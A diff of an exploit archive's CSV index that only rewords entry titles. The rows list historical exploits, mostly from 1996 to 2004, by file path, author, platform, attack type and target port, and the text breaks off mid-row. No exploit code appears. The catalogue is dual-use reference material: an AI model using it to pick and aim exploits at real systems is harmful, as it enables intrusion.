diff --git a/files.csv b/files.csv index 1a07ad23d..4801aa015 100755 --- a/files.csv +++ b/files.csv @@ -1,10 +1,10 @@ id,file,description,date,author,platform,type,port -1,platforms/windows/remote/1.c,"Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 -2,platforms/windows/remote/2.c,"Microsoft Windows IIS 5.0 WebDAV - Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 +1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 +2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 -6,platforms/php/webapps/6.php,"Wordpress 2.0.2 - (cache) Remote Shell Injection",2006-05-25,rgod,php,webapps,0 +6,platforms/php/webapps/6.php,"WordPress 2.0.2 - (cache) Remote Shell Injection",2006-05-25,rgod,php,webapps,0 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x - Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 @@ -13,28 +13,28 @@ id,file,description,date,author,platform,type,port 11,platforms/linux/dos/11.c,"Apache 2.0.44 (Linux) - Remote Denial of Service",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service",2003-04-18,"Luca Ercoli",windows,dos,0 -15,platforms/osx/local/15.c,"Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 +15,platforms/osx/local/15.c,"Apple Mac OS X 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",windows,dos,0 -18,platforms/linux/remote/18.sh,"Snort 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0 +18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Root Exploit",2003-04-23,truff,linux,remote,0 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit",2003-04-25,blightninjas,linux,remote,1723 -20,platforms/windows/remote/20.txt,"Microsoft Windows SMB - Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 +20,platforms/windows/remote/20.txt,"Microsoft Windows - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service (PoC)",2003-04-29,aT4r,windows,dos,0 23,platforms/windows/remote/23.c,"Real Server < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554 -24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25 +24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - Prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25 25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 26,platforms/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - Remote Users Ident (gossh.sh)",2003-05-02,"Nicolas Couture",linux,remote,0 27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80 -28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution Exploit",2003-05-08,Burebista,windows,remote,0 +28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,windows,remote,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution Exploit",2003-05-12,anonymous,windows,remote,0 31,platforms/linux/local/31.pl,"CdRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 -35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service",2003-05-31,Shachank,windows,dos,0 -36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 +35,platforms/windows/dos/35.c,"Microsoft IIS 5.0 < 5.1 - Remote Denial of Service",2003-05-31,Shachank,windows,dos,0 +36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69 @@ -42,18 +42,18 @@ id,file,description,date,author,platform,type,port 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25 43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - (mod_sql) SQL Injection",2003-06-19,Spaine,linux,remote,21 -44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection password disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0 +44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 -47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion Exploit",2003-06-30,Spoofed,php,webapps,0 +47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 -51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 +51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 -55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 +55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 @@ -62,22 +62,22 @@ id,file,description,date,author,platform,type,port 61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos,0 62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service",2003-07-22,zerash,hardware,dos,0 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114 -64,platforms/windows/remote/64.c,"Microsoft Windows - (RPC DCOM) Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 +64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 -66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 -67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80 +66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 +67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80 68,platforms/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",linux,dos,0 69,platforms/windows/remote/69.c,"Microsoft Windows - RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 -70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135 +70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,windows,dos,0 74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 -76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 +76,platforms/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,hardware,remote,80 78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21 -79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - SYSTEM Exploit",2003-08-13,ash,windows,local,0 +79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - System Exploit",2003-08-13,ash,windows,local,0 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow",2003-08-13,"David Litchfield",windows,remote,2100 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote,0 @@ -94,19 +94,19 @@ id,file,description,date,author,platform,type,port 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - Denial of Service",2003-09-08,badpack3t,multiple,dos,80 95,platforms/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow",2003-09-10,"Luigi Auriemma",multiple,remote,0 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow",2003-09-11,B-r00t,osx,remote,21 -97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 +97,platforms/windows/remote/97.c,"Microsoft Windows - 'RPC DCOM' Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306 99,platforms/linux/remote/99.c,"Pine 4.56 - Remote Buffer Overflow",2003-09-16,sorbo,linux,remote,0 -100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow (MS03-026)",2003-09-16,ey4s,windows,remote,135 +100,platforms/windows/remote/100.c,"Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026)",2003-09-16,ey4s,windows,remote,135 101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617 -103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 +103,platforms/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 104,platforms/linux/local/104.c,"hztty 2.0 - Privilege Escalation (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308 106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 -109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 -110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit",2003-10-13,Haggis,linux,remote,21 +109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 +110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / Brute Force Exploit",2003-10-13,Haggis,linux,remote,21 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0 113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 @@ -117,13 +117,13 @@ id,file,description,date,author,platform,type,port 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Privilege Escalation",2003-11-13,Li0n7,linux,local,0 -121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 +121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80 -127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 +127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation (PoC) (1)",2003-12-02,"Christophe Devine",linux,local,0 130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation (2)",2003-12-05,"Wojciech Purczynski",linux,local,0 @@ -169,9 +169,9 @@ id,file,description,date,author,platform,type,port 173,platforms/linux/remote/173.pl,"Monit 4.1 - Remote Root Buffer Overflow",2004-04-09,gsicht,linux,remote,2812 174,platforms/linux/remote/174.c,"Monit 4.2 - Remote Root Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812 175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote,0 -176,platforms/windows/dos/176.c,"Microsoft Windows IIS - SSL Remote Denial of Service (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 +176,platforms/windows/dos/176.c,"Microsoft IIS - SSL Remote Denial of Service (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Exploit",2000-11-15,keelis,cgi,webapps,0 -178,platforms/linux/local/178.c,"traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0 +178,platforms/linux/local/178.c,"Traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,linux,local,0 181,platforms/linux/remote/181.c,"Half Life - (rcon) Remote Buffer Overflow",2000-11-16,"Sao Paulo",linux,remote,27015 @@ -195,7 +195,7 @@ id,file,description,date,author,platform,type,port 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0 204,platforms/linux/remote/204.c,"BFTPd - vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21 -205,platforms/linux/local/205.pl,"Redhat 6.2 /usr/bin/rcp - suid Privledge Exploit",2000-11-29,Tlabs,linux,local,0 +205,platforms/linux/local/205.pl,"Redhat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit",2000-11-29,Tlabs,linux,local,0 206,platforms/linux/local/206.c,"dump 0.4b15 (Redhat 6.2) - Exploit",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 @@ -260,7 +260,7 @@ id,file,description,date,author,platform,type,port 272,platforms/windows/local/272.c,"WinZip - MIME Parsing Overflow (PoC)",2004-04-15,snooq,windows,local,0 273,platforms/linux/local/273.c,"SquirrelMail - chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0 -275,platforms/windows/remote/275.c,"Microsoft Windows IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 +275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 276,platforms/windows/dos/276.delphi,"Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53 279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 @@ -273,7 +273,7 @@ id,file,description,date,author,platform,type,port 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - (prodb) Privilege Escalation",2001-03-04,"the itch",multiple,local,0 289,platforms/cgi/webapps/289.pl,"sendtemp.pl - Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0 -290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - ld_preload Local Exploit",2001-03-04,Shadow,linux,local,0 +290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - LD_PRELOAD Local Exploit",2001-03-04,Shadow,linux,local,0 291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 293,platforms/windows/remote/293.c,"Microsoft Windows - Lsasrv.dll RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 @@ -289,13 +289,13 @@ id,file,description,date,author,platform,type,port 304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,linux,dos,0 307,platforms/linux/remote/307.py,"rlpr 2.04 - msg() Remote Format String Exploit",2004-06-25,jaguar,linux,remote,7290 -308,platforms/linux/remote/308.c,"MPlayer 1.0pre4 GUI - filename handling Overflow",2004-07-04,c0ntex,linux,remote,0 +308,platforms/linux/remote/308.c,"MPlayer 1.0pre4 GUI - Filename handling Overflow",2004-07-04,c0ntex,linux,remote,0 309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps,0 310,platforms/windows/remote/310.txt,"Microsoft Internet Explorer - Remote Application.Shell Exploit",2004-07-09,Jelmer,windows,remote,0 -311,platforms/multiple/remote/311.pl,"MySQL 4.1/5.0 - zero-length password Authentication Bypass Exploit",2004-07-10,"Eli Kara",multiple,remote,3306 +311,platforms/multiple/remote/311.pl,"MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass Exploit",2004-07-10,"Eli Kara",multiple,remote,3306 312,platforms/windows/dos/312.txt,"Norton AntiVirus - Denial of Service",2004-07-12,"Bipin Gautam",windows,dos,0 313,platforms/windows/remote/313.txt,"Microsoft Outlook Express - Window Opener",2004-07-13,anonymous,windows,remote,0 -315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - Javascript Execution",2004-07-13,anonymous,windows,remote,0 +315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0 316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0 319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0 @@ -315,7 +315,7 @@ id,file,description,date,author,platform,type,port 336,platforms/irix/local/336.c,"IRIX - /bin/login Local Buffer Overflow",1997-05-26,"David Hedley",irix,local,0 337,platforms/irix/local/337.c,"IRIX 5.3 - /usr/sbin/iwsh Buffer Overflow Privilege Escalation",1997-05-27,"David Hedley",irix,local,0 338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation",1997-05-28,"David Hedley",solaris,local,0 -339,platforms/linux/local/339.c,"zgv - $HOME Buffer Overflow",1997-06-20,"BeastMaster V",linux,local,0 +339,platforms/linux/local/339.c,"zgv - '$HOME' Buffer Overflow",1997-06-20,"BeastMaster V",linux,local,0 340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143 341,platforms/solaris/local/341.c,"Solaris 2.4 - passwd & yppasswd & nispasswd Overflows",1997-07-12,"Cristian Schipor",solaris,local,0 343,platforms/bsd/dos/343.c,"TCP SYN - 'bang.c' Denial of Service",2002-09-17,Nebunu,bsd,dos,0 @@ -329,7 +329,7 @@ id,file,description,date,author,platform,type,port 352,platforms/windows/local/352.c,"Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0 353,platforms/windows/local/353.c,"Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0 354,platforms/windows/dos/354.html,"Microsoft Internet Explorer - Overly Trusted Location Cache Exploit",2004-07-18,anonymous,windows,dos,0 -355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager (All-In-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 +355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager (All-in-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 356,platforms/windows/dos/356.c,"OverByte ICS FTP Server - Remote Denial of Service",2004-07-20,ATmaCA,windows,dos,0 357,platforms/windows/dos/357.c,"Medal of Honor - Remote Buffer Overflow",2004-07-20,"Luigi Auriemma",windows,dos,0 358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",hardware,dos,0 @@ -341,8 +341,8 @@ id,file,description,date,author,platform,type,port 364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorization Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,windows,dos,0 -367,platforms/osx/local/367.txt,"Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0 -368,platforms/windows/local/368.c,"Microsoft Windows XP - Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 +367,platforms/osx/local/367.txt,"Apple Mac OS X - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0 +368,platforms/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 369,platforms/linux/local/369.pl,"SoX - Local Buffer 